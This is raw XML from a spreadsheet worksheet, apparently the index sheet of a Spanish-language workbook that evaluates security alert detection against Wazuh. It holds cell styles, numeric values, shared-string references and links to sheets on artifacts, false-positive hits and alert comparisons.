      <c r="I3" s="39"/>
      <c r="J3" s="85" t="s">
        <v>2734</v>
      </c>
      <c r="K3" s="85"/>
      <c r="L3" s="85"/>
      <c r="M3" s="85"/>
      <c r="N3" s="85"/>
      <c r="O3" s="40"/>
      <c r="P3" s="40"/>
      <c r="Q3" s="40"/>
      <c r="R3" s="40"/>
      <c r="S3" s="50" t="s">
        <v>2145</v>
      </c>
      <c r="T3" s="40">
        <v>9</v>
      </c>
      <c r="U3" s="40"/>
      <c r="V3" s="40"/>
      <c r="W3" s="40"/>
    </row>
    <row r="4" spans="1:23" ht="24" customHeight="1">
      <c r="A4" s="52" t="s">
        <v>2391</v>
      </c>
      <c r="B4" s="53">
        <v>5</v>
      </c>
      <c r="C4" s="52" t="s">
        <v>2717</v>
      </c>
      <c r="D4" s="44"/>
      <c r="E4" s="54" t="s">
        <v>26</v>
      </c>
      <c r="F4" s="54" t="s">
        <v>2731</v>
      </c>
      <c r="G4" s="55">
        <v>0.35714285714285715</v>
      </c>
      <c r="H4" s="48" t="s">
        <v>3398</v>
      </c>
      <c r="I4" s="30"/>
      <c r="J4" s="86" t="s">
        <v>2735</v>
      </c>
      <c r="K4" s="87"/>
      <c r="L4" s="87"/>
      <c r="M4" s="87"/>
      <c r="N4" s="88"/>
      <c r="O4" s="40"/>
      <c r="P4" s="40"/>
      <c r="Q4" s="40"/>
      <c r="R4" s="40"/>
      <c r="S4" s="50" t="s">
        <v>2137</v>
      </c>
      <c r="T4" s="40">
        <v>3</v>
      </c>
      <c r="U4" s="40"/>
      <c r="V4" s="40"/>
      <c r="W4" s="40"/>
    </row>
    <row r="5" spans="1:23" ht="24" customHeight="1">
      <c r="A5" s="52" t="s">
        <v>2399</v>
      </c>
      <c r="B5" s="52" t="s">
        <v>1503</v>
      </c>
      <c r="C5" s="52" t="s">
        <v>3401</v>
      </c>
      <c r="D5" s="44"/>
      <c r="E5" s="56" t="s">
        <v>27</v>
      </c>
      <c r="F5" s="56" t="s">
        <v>2732</v>
      </c>
      <c r="G5" s="57">
        <v>0.42857142857142855</v>
      </c>
      <c r="H5" s="49" t="s">
        <v>3399</v>
      </c>
      <c r="I5" s="31"/>
      <c r="J5" s="89" t="s">
        <v>2736</v>
      </c>
      <c r="K5" s="90"/>
      <c r="L5" s="90"/>
      <c r="M5" s="90"/>
      <c r="N5" s="91"/>
      <c r="O5" s="40"/>
      <c r="P5" s="40"/>
      <c r="Q5" s="40"/>
      <c r="R5" s="40"/>
      <c r="S5" s="50" t="s">
        <v>1151</v>
      </c>
      <c r="T5" s="40">
        <v>3</v>
      </c>
      <c r="U5" s="40"/>
      <c r="V5" s="40"/>
      <c r="W5" s="40"/>
    </row>
    <row r="6" spans="1:23" ht="24" customHeight="1">
      <c r="A6" s="52" t="s">
        <v>2718</v>
      </c>
      <c r="B6" s="52" t="s">
        <v>2719</v>
      </c>
      <c r="C6" s="52" t="s">
        <v>2720</v>
      </c>
      <c r="D6" s="44"/>
      <c r="E6" s="56" t="s">
        <v>1660</v>
      </c>
      <c r="F6" s="56" t="s">
        <v>2733</v>
      </c>
      <c r="G6" s="57">
        <v>0.5</v>
      </c>
      <c r="H6" s="49" t="s">
        <v>3400</v>
      </c>
      <c r="I6" s="31"/>
      <c r="J6" s="92" t="s">
        <v>2737</v>
      </c>
      <c r="K6" s="93"/>
      <c r="L6" s="93"/>
      <c r="M6" s="93"/>
      <c r="N6" s="94"/>
      <c r="O6" s="40"/>
      <c r="P6" s="40"/>
      <c r="Q6" s="40"/>
      <c r="R6" s="40"/>
      <c r="S6" s="50" t="s">
        <v>1156</v>
      </c>
      <c r="T6" s="40">
        <v>4</v>
      </c>
      <c r="U6" s="40"/>
      <c r="V6" s="40"/>
      <c r="W6" s="40"/>
    </row>
    <row r="7" spans="1:23" ht="47.25">
      <c r="A7" s="52" t="s">
        <v>2639</v>
      </c>
      <c r="B7" s="52" t="s">
        <v>2401</v>
      </c>
      <c r="C7" s="52" t="s">
        <v>3402</v>
      </c>
      <c r="D7" s="44"/>
      <c r="E7" s="58"/>
      <c r="F7" s="59"/>
      <c r="G7" s="60"/>
      <c r="H7" s="32"/>
      <c r="I7" s="33"/>
      <c r="J7" s="95" t="s">
        <v>2738</v>
      </c>
      <c r="K7" s="96"/>
      <c r="L7" s="96"/>
      <c r="M7" s="96"/>
      <c r="N7" s="97"/>
      <c r="O7" s="40"/>
      <c r="P7" s="40"/>
      <c r="Q7" s="40"/>
      <c r="R7" s="40"/>
      <c r="S7" s="40"/>
      <c r="T7" s="40"/>
      <c r="U7" s="40"/>
      <c r="V7" s="40"/>
      <c r="W7" s="40"/>
    </row>
    <row r="8" spans="1:23" ht="31.5">
      <c r="A8" s="61" t="s">
        <v>1507</v>
      </c>
      <c r="B8" s="61" t="s">
        <v>2721</v>
      </c>
      <c r="C8" s="61" t="s">
        <v>2722</v>
      </c>
      <c r="D8" s="39"/>
      <c r="E8" s="83" t="s">
        <v>3404</v>
      </c>
      <c r="F8" s="83"/>
      <c r="G8" s="83"/>
      <c r="H8" s="83"/>
      <c r="I8" s="39"/>
      <c r="J8" s="98" t="s">
        <v>2739</v>
      </c>
      <c r="K8" s="99"/>
      <c r="L8" s="99"/>
      <c r="M8" s="99"/>
      <c r="N8" s="99"/>
      <c r="O8" s="40"/>
      <c r="P8" s="40"/>
      <c r="Q8" s="40"/>
      <c r="R8" s="40"/>
      <c r="S8" s="40"/>
      <c r="T8" s="40"/>
      <c r="U8" s="40"/>
      <c r="V8" s="40"/>
      <c r="W8" s="40"/>
    </row>
    <row r="9" spans="1:23" ht="15.75">
      <c r="A9" s="61" t="s">
        <v>1151</v>
      </c>
      <c r="B9" s="61" t="s">
        <v>1504</v>
      </c>
      <c r="C9" s="61" t="s">
        <v>2723</v>
      </c>
      <c r="D9" s="39"/>
      <c r="E9" s="83"/>
      <c r="F9" s="83"/>
      <c r="G9" s="83"/>
      <c r="H9" s="83"/>
      <c r="I9" s="39"/>
      <c r="J9" s="100" t="s">
        <v>724</v>
      </c>
      <c r="K9" s="101"/>
      <c r="L9" s="101"/>
      <c r="M9" s="101"/>
      <c r="N9" s="101"/>
      <c r="O9" s="40"/>
      <c r="P9" s="40"/>
      <c r="Q9" s="40"/>
      <c r="R9" s="40"/>
      <c r="S9" s="50" t="s">
        <v>34</v>
      </c>
      <c r="T9" s="50" t="s">
        <v>2145</v>
      </c>
      <c r="U9" s="50" t="s">
        <v>2137</v>
      </c>
      <c r="V9" s="50" t="s">
        <v>1151</v>
      </c>
      <c r="W9" s="50" t="s">
        <v>1156</v>
      </c>
    </row>
    <row r="10" spans="1:23" ht="15.75">
      <c r="A10" s="61" t="s">
        <v>1156</v>
      </c>
      <c r="B10" s="61" t="s">
        <v>2358</v>
      </c>
      <c r="C10" s="61" t="s">
        <v>2724</v>
      </c>
      <c r="D10" s="39"/>
      <c r="E10" s="83"/>
      <c r="F10" s="83"/>
      <c r="G10" s="83"/>
      <c r="H10" s="83"/>
      <c r="I10" s="39"/>
      <c r="J10" s="103" t="s">
        <v>2740</v>
      </c>
      <c r="K10" s="104"/>
      <c r="L10" s="104"/>
      <c r="M10" s="104"/>
      <c r="N10" s="104"/>
      <c r="O10" s="40"/>
      <c r="P10" s="40"/>
      <c r="Q10" s="40"/>
      <c r="R10" s="40"/>
      <c r="S10" s="50" t="s">
        <v>44</v>
      </c>
      <c r="T10" s="40">
        <v>1</v>
      </c>
      <c r="U10" s="40">
        <v>1</v>
      </c>
      <c r="V10" s="40">
        <v>0</v>
      </c>
      <c r="W10" s="40">
        <v>1</v>
      </c>
    </row>
    <row r="11" spans="1:23" ht="15.75">
      <c r="A11" s="62" t="s">
        <v>2725</v>
      </c>
      <c r="B11" s="62" t="s">
        <v>2726</v>
      </c>
      <c r="C11" s="62" t="s">
        <v>2727</v>
      </c>
      <c r="D11" s="39"/>
      <c r="E11" s="39"/>
      <c r="F11" s="39"/>
      <c r="G11" s="39"/>
      <c r="H11" s="39"/>
      <c r="I11" s="39"/>
      <c r="J11" s="100" t="s">
        <v>2741</v>
      </c>
      <c r="K11" s="101"/>
      <c r="L11" s="101"/>
      <c r="M11" s="101"/>
      <c r="N11" s="101"/>
      <c r="O11" s="40"/>
      <c r="P11" s="40"/>
      <c r="Q11" s="40"/>
      <c r="R11" s="40"/>
      <c r="S11" s="50" t="s">
        <v>53</v>
      </c>
      <c r="T11" s="40">
        <v>1</v>
      </c>
      <c r="U11" s="40">
        <v>0</v>
      </c>
      <c r="V11" s="40">
        <v>1</v>
      </c>
      <c r="W11" s="40">
        <v>0</v>
      </c>
    </row>
    <row r="12" spans="1:23" ht="31.5">
      <c r="A12" s="63" t="s">
        <v>31</v>
      </c>
      <c r="B12" s="63" t="s">
        <v>2407</v>
      </c>
      <c r="C12" s="63" t="s">
        <v>2728</v>
      </c>
      <c r="D12" s="39"/>
      <c r="E12" s="84" t="s">
        <v>2144</v>
      </c>
      <c r="F12" s="84"/>
      <c r="G12" s="84"/>
      <c r="H12" s="84"/>
      <c r="I12" s="39"/>
      <c r="J12" s="103" t="s">
        <v>2742</v>
      </c>
      <c r="K12" s="104"/>
      <c r="L12" s="104"/>
      <c r="M12" s="104"/>
      <c r="N12" s="104"/>
      <c r="O12" s="40"/>
      <c r="P12" s="40"/>
      <c r="Q12" s="40"/>
      <c r="R12" s="40"/>
      <c r="S12" s="50" t="s">
        <v>60</v>
      </c>
      <c r="T12" s="40">
        <v>1</v>
      </c>
      <c r="U12" s="40">
        <v>1</v>
      </c>
      <c r="V12" s="40">
        <v>0</v>
      </c>
      <c r="W12" s="40">
        <v>0</v>
      </c>
    </row>
    <row r="13" spans="1:23" ht="31.5">
      <c r="A13" s="52" t="s">
        <v>2729</v>
      </c>
      <c r="B13" s="52" t="s">
        <v>2411</v>
      </c>
      <c r="C13" s="52" t="s">
        <v>2730</v>
      </c>
      <c r="D13" s="39"/>
      <c r="E13" s="84"/>
      <c r="F13" s="84"/>
      <c r="G13" s="84"/>
      <c r="H13" s="84"/>
      <c r="I13" s="39"/>
      <c r="J13" s="100" t="s">
        <v>2743</v>
      </c>
      <c r="K13" s="101"/>
      <c r="L13" s="101"/>
      <c r="M13" s="101"/>
      <c r="N13" s="101"/>
      <c r="O13" s="40"/>
      <c r="P13" s="40"/>
      <c r="Q13" s="40"/>
      <c r="R13" s="40"/>
      <c r="S13" s="50" t="s">
        <v>68</v>
      </c>
      <c r="T13" s="40">
        <v>1</v>
      </c>
      <c r="U13" s="40">
        <v>0</v>
      </c>
      <c r="V13" s="40">
        <v>1</v>
      </c>
      <c r="W13" s="40">
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:23" ht="15.75">
      <c r="A14" s="64"/>
      <c r="B14" s="65"/>
      <c r="C14" s="64"/>
      <c r="D14" s="39"/>
      <c r="E14" s="84"/>
      <c r="F14" s="84"/>
      <c r="G14" s="84"/>
      <c r="H14" s="84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50" t="s">
        <v>77</v>
      </c>
      <c r="T14" s="40">
        <v>1</v>
      </c>
      <c r="U14" s="40">
        <v>1</v>
      </c>
      <c r="V14" s="40">
        <v>0</v>
      </c>
      <c r="W14" s="40">
        <v>1</v>
      </c>
    </row>
    <row r="15" spans="1:23" ht="21.95" customHeight="1">
      <c r="A15" s="66"/>
      <c r="B15" s="66"/>
      <c r="C15" s="66"/>
      <c r="D15" s="40"/>
      <c r="E15" s="40"/>
      <c r="F15" s="40"/>
      <c r="G15" s="40"/>
      <c r="H15" s="102" t="s">
        <v>3397</v>
      </c>
      <c r="I15" s="102"/>
      <c r="J15" s="102"/>
      <c r="K15" s="102"/>
      <c r="L15" s="102"/>
      <c r="M15" s="102"/>
      <c r="N15" s="102"/>
      <c r="O15" s="40"/>
      <c r="P15" s="40"/>
      <c r="Q15" s="40"/>
      <c r="R15" s="40"/>
      <c r="S15" s="50" t="s">
        <v>84</v>
      </c>
      <c r="T15" s="40">
        <v>1</v>
      </c>
      <c r="U15" s="40">
        <v>0</v>
      </c>
      <c r="V15" s="40">
        <v>1</v>
      </c>
      <c r="W15" s="40">
        <v>0</v>
      </c>
    </row>
    <row r="16" spans="1:23" ht="21.95" customHeight="1">
      <c r="A16" s="66"/>
      <c r="B16" s="67"/>
      <c r="C16" s="66"/>
      <c r="D16" s="40"/>
      <c r="E16" s="40"/>
      <c r="F16" s="40"/>
      <c r="G16" s="40"/>
      <c r="H16" s="102"/>
      <c r="I16" s="102"/>
      <c r="J16" s="102"/>
      <c r="K16" s="102"/>
      <c r="L16" s="102"/>
      <c r="M16" s="102"/>
      <c r="N16" s="102"/>
      <c r="O16" s="40"/>
      <c r="P16" s="40"/>
      <c r="Q16" s="40"/>
      <c r="R16" s="40"/>
      <c r="S16" s="50" t="s">
        <v>90</v>
      </c>
      <c r="T16" s="40">
        <v>1</v>
      </c>
      <c r="U16" s="40">
        <v>0</v>
      </c>
      <c r="V16" s="40">
        <v>0</v>
      </c>
      <c r="W16" s="40">
        <v>1</v>
      </c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50" t="s">
        <v>97</v>
      </c>
      <c r="T17" s="40">
        <v>1</v>
      </c>
      <c r="U17" s="40">
        <v>0</v>
      </c>
      <c r="V17" s="40">
        <v>0</v>
      </c>
      <c r="W17" s="40">
        <v>1</v>
      </c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50" t="s">
        <v>31</v>
      </c>
      <c r="T18" s="40">
        <v>1</v>
      </c>
      <c r="U18" s="40">
        <v>0</v>
      </c>
      <c r="V18" s="40">
        <v>0</v>
      </c>
      <c r="W18" s="40">
        <v>0</v>
      </c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50" t="s">
        <v>2744</v>
      </c>
      <c r="T21" s="50" t="s">
        <v>1488</v>
      </c>
      <c r="U21" s="50" t="s">
        <v>2138</v>
      </c>
      <c r="V21" s="40"/>
      <c r="W21" s="40"/>
    </row>
    <row r="22" spans="1:2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0" t="s">
        <v>166</v>
      </c>
      <c r="T22" s="40">
        <v>9</v>
      </c>
      <c r="U22" s="40">
        <v>9</v>
      </c>
      <c r="V22" s="40"/>
      <c r="W22" s="40"/>
    </row>
    <row r="23" spans="1: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0" t="s">
        <v>471</v>
      </c>
      <c r="T23" s="40">
        <v>9</v>
      </c>
      <c r="U23" s="40">
        <v>3</v>
      </c>
      <c r="V23" s="40"/>
      <c r="W23" s="40"/>
    </row>
    <row r="24" spans="1:2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0" t="s">
        <v>606</v>
      </c>
      <c r="T24" s="40">
        <v>9</v>
      </c>
      <c r="U24" s="40">
        <v>3</v>
      </c>
      <c r="V24" s="40"/>
      <c r="W24" s="40"/>
    </row>
    <row r="25" spans="1:2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50" t="s">
        <v>675</v>
      </c>
      <c r="T28" s="50" t="s">
        <v>2745</v>
      </c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50" t="s">
        <v>26</v>
      </c>
      <c r="T29" s="40">
        <v>5</v>
      </c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50" t="s">
        <v>27</v>
      </c>
      <c r="T30" s="40">
        <v>6</v>
      </c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50" t="s">
        <v>1660</v>
      </c>
      <c r="T31" s="40">
        <v>7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50" t="s">
        <v>342</v>
      </c>
      <c r="T35" s="50" t="s">
        <v>1513</v>
      </c>
      <c r="U35" s="50" t="s">
        <v>2746</v>
      </c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50" t="s">
        <v>2139</v>
      </c>
      <c r="T36" s="40">
        <v>73</v>
      </c>
      <c r="U36" s="40">
        <v>4</v>
      </c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50" t="s">
        <v>319</v>
      </c>
      <c r="T37" s="40">
        <v>0</v>
      </c>
      <c r="U37" s="40">
        <v>0</v>
      </c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50" t="s">
        <v>318</v>
      </c>
      <c r="T38" s="40">
        <v>18</v>
      </c>
      <c r="U38" s="40">
        <v>0</v>
      </c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 t="s">
        <v>320</v>
      </c>
      <c r="T39" s="40">
        <v>24</v>
      </c>
      <c r="U39" s="40">
        <v>0</v>
      </c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 t="s">
        <v>2140</v>
      </c>
      <c r="T40" s="40">
        <v>0</v>
      </c>
      <c r="U40" s="40">
        <v>0</v>
      </c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 t="s">
        <v>1740</v>
      </c>
      <c r="T41" s="40">
        <v>12</v>
      </c>
      <c r="U41" s="40">
        <v>0</v>
      </c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 t="s">
        <v>162</v>
      </c>
      <c r="T44" s="50" t="s">
        <v>2141</v>
      </c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 t="s">
        <v>1527</v>
      </c>
      <c r="T45" s="40">
        <v>5</v>
      </c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 t="s">
        <v>2142</v>
      </c>
      <c r="T46" s="40">
        <v>0</v>
      </c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 t="s">
        <v>1558</v>
      </c>
      <c r="T47" s="40">
        <v>1</v>
      </c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 t="s">
        <v>2143</v>
      </c>
      <c r="T48" s="40">
        <v>0</v>
      </c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 t="s">
        <v>1599</v>
      </c>
      <c r="T49" s="40">
        <v>0</v>
      </c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4.25" customHeight="1">
      <c r="A51" s="34"/>
      <c r="B51" s="34"/>
      <c r="C51" s="34"/>
      <c r="D51" s="34"/>
      <c r="E51" s="3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4.25" customHeight="1">
      <c r="A52" s="34"/>
      <c r="B52" s="34"/>
      <c r="C52" s="34"/>
      <c r="D52" s="34"/>
      <c r="E52" s="3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4.25" customHeight="1">
      <c r="A53" s="34"/>
      <c r="B53" s="34"/>
      <c r="C53" s="34"/>
      <c r="D53" s="34"/>
      <c r="E53" s="3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</sheetData>
  <mergeCells count="17">
    <mergeCell ref="H15:N16"/>
    <mergeCell ref="J10:N10"/>
    <mergeCell ref="J11:N11"/>
    <mergeCell ref="J12:N12"/>
    <mergeCell ref="J13:N13"/>
    <mergeCell ref="A1:N1"/>
    <mergeCell ref="A2:N2"/>
    <mergeCell ref="E3:H3"/>
    <mergeCell ref="E8:H10"/>
    <mergeCell ref="E12:H14"/>
    <mergeCell ref="J3:N3"/>
    <mergeCell ref="J4:N4"/>
    <mergeCell ref="J5:N5"/>
    <mergeCell ref="J6:N6"/>
    <mergeCell ref="J7:N7"/>
    <mergeCell ref="J8:N8"/>
    <mergeCell ref="J9:N9"/>
  </mergeCells>
  <conditionalFormatting sqref="A4:C11">
    <cfRule type="expression" dxfId="36" priority="1">
      <formula>$B5&gt;0</formula>
    </cfRule>
  </conditionalFormatting>
  <hyperlinks>
    <hyperlink ref="J4" location="'07_Catalogo_Artifacts'!A1" display="Catálogo de artifacts" xr:uid="{A4521173-FB39-46C4-B358-6AA387ADD3A6}"/>
    <hyperlink ref="J5" location="'09_Resultados_Custom'!A1" display="Resultados custom" xr:uid="{A0A044C2-D647-4C6E-8D7F-28D7A9F17DA4}"/>
    <hyperlink ref="J6" location="'VISIBILIDAD_SISTEMA'!A1" display="Visibilidad del sistema" xr:uid="{2D6A7EE1-9876-4CCB-B508-51D0908DD78A}"/>
    <hyperlink ref="J7" location="'ALERTAS_VR'!A1" display="Alertas VR" xr:uid="{A0641AAC-9670-4189-8179-D65CCD789642}"/>
    <hyperlink ref="J8" location="'FP_RUNNER'!A1" display="Runner FP" xr:uid="{E9CD80AE-815C-4546-A048-DCF22D0577FF}"/>
    <hyperlink ref="J9" location="'FP_HITS'!A1" display="Hits FP" xr:uid="{839F1B97-E5C5-4EE5-940A-9308055DC01A}"/>
    <hyperlink ref="J10" location="'COMPARACION_VR_WAZUH'!A1" display="Comparación VR-Wazuh" xr:uid="{4DA0582E-16BF-4B3D-AF09-B86E8D621D59}"/>
    <hyperlink ref="J11" location="'WAZUH_DETALLE'!A1" display="Detalle Wazuh" xr:uid="{413108E6-3909-4312-B8D2-5DB75E734ED5}"/>
    <hyperlink ref="J12" location="'GRAFICAS'!A1" display="Gráficas" xr:uid="{6A3C339F-2B29-45D9-A9C3-225F749B462D}"/>
    <hyperlink ref="J13" location="'FUENTES'!A1" display="Fuentes" xr:uid="{A1A4DC52-AA5B-4537-97F4-F242299CEEC1}"/>
  </hyperlinks>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.25" right="0.25" top="0.4" bottom="0.4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105" t="s">
        <v>32</v>
      </c>
      <c r="B1" s="106"/>
      <c r="C1" s="106"/>
      <c r="D1" s="106"/>
      <c r="E1" s="106"/>
      <c r="F1" s="106"/>
      <c r="G1" s="106"/>
      <c r="H1" s="106"/>
      <c r="I1" s="106"/>
      <c r="J1" s="10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7" t="s">
        <v>33</v>
      </c>
      <c r="B2" s="107"/>
      <c r="C2" s="107"/>
      <c r="D2" s="107"/>
      <c r="E2" s="107"/>
      <c r="F2" s="107"/>
      <c r="G2" s="107"/>
      <c r="H2" s="107"/>
      <c r="I2" s="107"/>
      <c r="J2" s="10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36" t="s">
        <v>44</v>
      </c>
      <c r="B5" s="36" t="s">
        <v>45</v>
      </c>
      <c r="C5" s="36" t="s">
        <v>46</v>
      </c>
      <c r="D5" s="36" t="s">
        <v>47</v>
      </c>
      <c r="E5" s="36"/>
      <c r="F5" s="36" t="s">
        <v>48</v>
      </c>
      <c r="G5" s="36" t="s">
        <v>49</v>
      </c>
      <c r="H5" s="36" t="s">
        <v>50</v>
      </c>
      <c r="I5" s="36" t="s">
        <v>51</v>
      </c>
      <c r="J5" s="36" t="s">
        <v>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6" t="s">
        <v>53</v>
      </c>
      <c r="B6" s="36" t="s">
        <v>54</v>
      </c>
      <c r="C6" s="36" t="s">
        <v>55</v>
      </c>
      <c r="D6" s="36" t="s">
        <v>47</v>
      </c>
      <c r="E6" s="36"/>
      <c r="F6" s="36" t="s">
        <v>56</v>
      </c>
      <c r="G6" s="36" t="s">
        <v>57</v>
      </c>
      <c r="H6" s="36" t="s">
        <v>58</v>
      </c>
      <c r="I6" s="36" t="s">
        <v>51</v>
      </c>
      <c r="J6" s="3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36" t="s">
        <v>60</v>
      </c>
      <c r="B7" s="36" t="s">
        <v>61</v>
      </c>
      <c r="C7" s="36" t="s">
        <v>62</v>
      </c>
      <c r="D7" s="36" t="s">
        <v>47</v>
      </c>
      <c r="E7" s="36" t="s">
        <v>63</v>
      </c>
      <c r="F7" s="36" t="s">
        <v>64</v>
      </c>
      <c r="G7" s="36" t="s">
        <v>65</v>
      </c>
      <c r="H7" s="36" t="s">
        <v>66</v>
      </c>
      <c r="I7" s="36" t="s">
        <v>51</v>
      </c>
      <c r="J7" s="36" t="s">
        <v>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36" t="s">
        <v>68</v>
      </c>
      <c r="B8" s="36" t="s">
        <v>69</v>
      </c>
      <c r="C8" s="36" t="s">
        <v>70</v>
      </c>
      <c r="D8" s="36" t="s">
        <v>71</v>
      </c>
      <c r="E8" s="36" t="s">
        <v>72</v>
      </c>
      <c r="F8" s="36" t="s">
        <v>73</v>
      </c>
      <c r="G8" s="36" t="s">
        <v>74</v>
      </c>
      <c r="H8" s="36" t="s">
        <v>75</v>
      </c>
      <c r="I8" s="36" t="s">
        <v>30</v>
      </c>
      <c r="J8" s="36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36" t="s">
        <v>77</v>
      </c>
      <c r="B9" s="36" t="s">
        <v>78</v>
      </c>
      <c r="C9" s="36" t="s">
        <v>79</v>
      </c>
      <c r="D9" s="36" t="s">
        <v>47</v>
      </c>
      <c r="E9" s="36"/>
      <c r="F9" s="36" t="s">
        <v>80</v>
      </c>
      <c r="G9" s="36" t="s">
        <v>81</v>
      </c>
      <c r="H9" s="36" t="s">
        <v>82</v>
      </c>
      <c r="I9" s="36" t="s">
        <v>51</v>
      </c>
      <c r="J9" s="36" t="s">
        <v>83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36" t="s">
        <v>84</v>
      </c>
      <c r="B10" s="36" t="s">
        <v>85</v>
      </c>
      <c r="C10" s="36" t="s">
        <v>86</v>
      </c>
      <c r="D10" s="36" t="s">
        <v>87</v>
      </c>
      <c r="E10" s="36"/>
      <c r="F10" s="36" t="s">
        <v>88</v>
      </c>
      <c r="G10" s="36" t="s">
        <v>89</v>
      </c>
      <c r="H10" s="36" t="s">
        <v>58</v>
      </c>
      <c r="I10" s="36" t="s">
        <v>30</v>
      </c>
      <c r="J10" s="36" t="s">
        <v>2363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6" t="s">
        <v>90</v>
      </c>
      <c r="B11" s="36" t="s">
        <v>91</v>
      </c>
      <c r="C11" s="36" t="s">
        <v>92</v>
      </c>
      <c r="D11" s="36" t="s">
        <v>93</v>
      </c>
      <c r="E11" s="36"/>
      <c r="F11" s="36" t="s">
        <v>94</v>
      </c>
      <c r="G11" s="36" t="s">
        <v>95</v>
      </c>
      <c r="H11" s="36" t="s">
        <v>96</v>
      </c>
      <c r="I11" s="36" t="s">
        <v>30</v>
      </c>
      <c r="J11" s="36" t="s">
        <v>2362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36" t="s">
        <v>97</v>
      </c>
      <c r="B12" s="36" t="s">
        <v>98</v>
      </c>
      <c r="C12" s="36" t="s">
        <v>99</v>
      </c>
      <c r="D12" s="36" t="s">
        <v>93</v>
      </c>
      <c r="E12" s="36"/>
      <c r="F12" s="36" t="s">
        <v>100</v>
      </c>
      <c r="G12" s="36" t="s">
        <v>101</v>
      </c>
      <c r="H12" s="36" t="s">
        <v>102</v>
      </c>
      <c r="I12" s="36" t="s">
        <v>30</v>
      </c>
      <c r="J12" s="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36" t="s">
        <v>31</v>
      </c>
      <c r="B13" s="36" t="s">
        <v>103</v>
      </c>
      <c r="C13" s="36" t="s">
        <v>104</v>
      </c>
      <c r="D13" s="36" t="s">
        <v>105</v>
      </c>
      <c r="E13" s="36" t="s">
        <v>106</v>
      </c>
      <c r="F13" s="36" t="s">
        <v>107</v>
      </c>
      <c r="G13" s="36" t="s">
        <v>108</v>
      </c>
      <c r="H13" s="36" t="s">
        <v>109</v>
      </c>
      <c r="I13" s="36" t="s">
        <v>30</v>
      </c>
      <c r="J13" s="36" t="s">
        <v>2361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0"/>
  <sheetViews>
    <sheetView zoomScale="80" zoomScaleNormal="80" workbookViewId="0">
      <pane xSplit="2" ySplit="3" topLeftCell="H4" activePane="bottomRight" state="frozenSplit"/>
      <selection pane="topRight" activeCell="C1" sqref="C1"/>
      <selection pane="bottomLeft" activeCell="A4" sqref="A4"/>
      <selection pane="bottomRight" activeCell="O20" sqref="O20"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="9" defaultRowHeight="15"/>
  <cols>
    <col min="1" max="2" width="12" style="42" customWidth="1"/>
    <col min="3" max="4" width="18" style="42" customWidth="1"/>
    <col min="5" max="5" width="34" style="42" customWidth="1"/>
    <col min="6" max="6" width="58.625" style="42" customWidth="1"/>
    <col min="7" max="7" width="18" style="42" customWidth="1"/>
    <col min="8" max="8" width="24" style="42" customWidth="1"/>
    <col min="9" max="9" width="20" style="42" customWidth="1"/>
    <col min="10" max="10" width="14" style="42" customWidth="1"/>
    <col min="11" max="11" width="62.625" style="42" customWidth="1"/>
    <col min="12" max="12" width="55" style="42" customWidth="1"/>
    <col min="13" max="13" width="14" style="42" customWidth="1"/>
    <col min="14" max="14" width="18" style="42" customWidth="1"/>
    <col min="15" max="15" width="59.5" style="42" customWidth="1"/>
    <col min="16" max="16384" width="9" style="42"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:22" ht="30" customHeight="1">
      <c r="A1" s="108" t="s">
        <v>110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40"/>
      <c r="Q1" s="40"/>
      <c r="R1" s="40"/>
      <c r="S1" s="40"/>
      <c r="T1" s="40"/>
      <c r="U1" s="40"/>
      <c r="V1" s="40"/>
    </row>
    <row r="2" spans="1:22" ht="33.950000000000003" customHeight="1">
      <c r="A2" s="110" t="s">
        <v>111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40"/>
      <c r="Q2" s="40"/>
      <c r="R2" s="40"/>
      <c r="S2" s="40"/>
      <c r="T2" s="40"/>
      <c r="U2" s="40"/>
      <c r="V2" s="40"/>
    </row>
    <row r="3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  <c r="Q3" s="40"/>
      <c r="R3" s="40"/>
      <c r="S3" s="40"/>
      <c r="T3" s="40"/>
      <c r="U3" s="40"/>
      <c r="V3" s="40"/>
    </row>
    <row r="4" spans="1:22" ht="31.5">
      <c r="A4" s="35" t="s">
        <v>112</v>
      </c>
      <c r="B4" s="35" t="s">
        <v>113</v>
      </c>
      <c r="C4" s="35" t="s">
        <v>114</v>
      </c>
      <c r="D4" s="35" t="s">
        <v>115</v>
      </c>
      <c r="E4" s="35" t="s">
        <v>116</v>
      </c>
      <c r="F4" s="35" t="s">
        <v>117</v>
      </c>
      <c r="G4" s="35" t="s">
        <v>118</v>
      </c>
      <c r="H4" s="35" t="s">
        <v>119</v>
      </c>
      <c r="I4" s="35" t="s">
        <v>120</v>
      </c>
      <c r="J4" s="35" t="s">
        <v>121</v>
      </c>
      <c r="K4" s="35" t="s">
        <v>122</v>
      </c>
      <c r="L4" s="35" t="s">
        <v>123</v>
      </c>
      <c r="M4" s="35" t="s">
        <v>124</v>
      </c>
      <c r="N4" s="35" t="s">
        <v>126</v>
      </c>
      <c r="O4" s="35" t="s">
        <v>127</v>
      </c>
      <c r="P4" s="40"/>
      <c r="Q4" s="40"/>
      <c r="R4" s="40"/>
      <c r="S4" s="40"/>
      <c r="T4" s="40"/>
      <c r="U4" s="40"/>
      <c r="V4" s="40"/>
    </row>
    <row r="5" spans="1:22" ht="63">
      <c r="A5" s="36" t="s">
        <v>128</v>
      </c>
      <c r="B5" s="36" t="s">
        <v>44</v>
      </c>
      <c r="C5" s="36" t="s">
        <v>45</v>
      </c>
      <c r="D5" s="36" t="s">
        <v>47</v>
      </c>
      <c r="E5" s="36" t="s">
        <v>129</v>
      </c>
      <c r="F5" s="36" t="s">
        <v>2373</v>
      </c>
      <c r="G5" s="36" t="s">
        <v>2374</v>
      </c>
      <c r="H5" s="36" t="s">
        <v>177</v>
      </c>
      <c r="I5" s="36" t="s">
        <v>2233</v>
      </c>
      <c r="J5" s="36" t="s">
        <v>130</v>
      </c>
      <c r="K5" s="36" t="s">
        <v>2375</v>
      </c>
      <c r="L5" s="36" t="s">
        <v>1692</v>
      </c>
      <c r="M5" s="36" t="s">
        <v>1489</v>
      </c>
      <c r="N5" s="36" t="s">
        <v>415</v>
      </c>
      <c r="O5" s="36" t="s">
        <v>1490</v>
      </c>
      <c r="P5" s="40"/>
      <c r="Q5" s="40"/>
      <c r="R5" s="40"/>
      <c r="S5" s="40"/>
      <c r="T5" s="40"/>
      <c r="U5" s="40"/>
      <c r="V5" s="40"/>
    </row>
    <row r="6" spans="1:22" ht="63">
      <c r="A6" s="36" t="s">
        <v>131</v>
      </c>
